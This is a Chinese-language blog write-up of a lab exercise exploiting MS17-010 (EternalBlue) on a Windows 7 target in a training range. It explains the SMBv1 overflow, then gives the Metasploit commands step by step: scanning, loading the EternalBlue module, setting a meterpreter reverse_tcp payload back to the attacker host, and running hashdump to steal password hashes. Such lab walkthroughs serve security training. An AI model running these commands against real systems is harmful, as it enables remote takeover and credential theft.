MS17-010远程溢出(CVE-2017-0143)

漏洞介绍

MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。

实验环境

这里我用的是安界网的靶场

kali 192.168.0.3
Windows7 192.168.0.2

漏洞利用

打开nmap对目标机进行扫描

nmap  -sV -Pn 192.168.0.2

目标机开放了135、139、445等端口,系统为win7
然后我们打开msf

msfconsole

打开 metasploite 命令行客户端,使用search命令查找ms17-010漏洞的相关模块

search ms17-010

由于这是靶场所以我们直接利用

use exploit/windows/smb/ms17_010_eternalblue

查看配置信息,并设置标记为yes的属性

show options

设置攻击目标机的IP地址

set RHOSTS 192.168.0.2

之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload

set payload  windows/x64/meterpreter/reverse_tcp

同样,载荷也需要进行配置,show options查看配置信息
配置中缺少本地主机 LHOST,设置一下

set LHOST 192.168.0.3

完成配置后,运行exploit或者run,开始执行漏洞利用模块

run

成功获取来自目标主机的Session会话

我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能
运行sysinfo查看目标机器相关信息

sysinfo

执行help命令可以帮助我们了解meterpreter有哪些功能

help

接下来,我们获取目标机hash值
执行hashdump

hashdump

总结

又是朴素而又充实的一天!

猜你喜欢

转载自blog.csdn.net/p_utao/article/details/108394587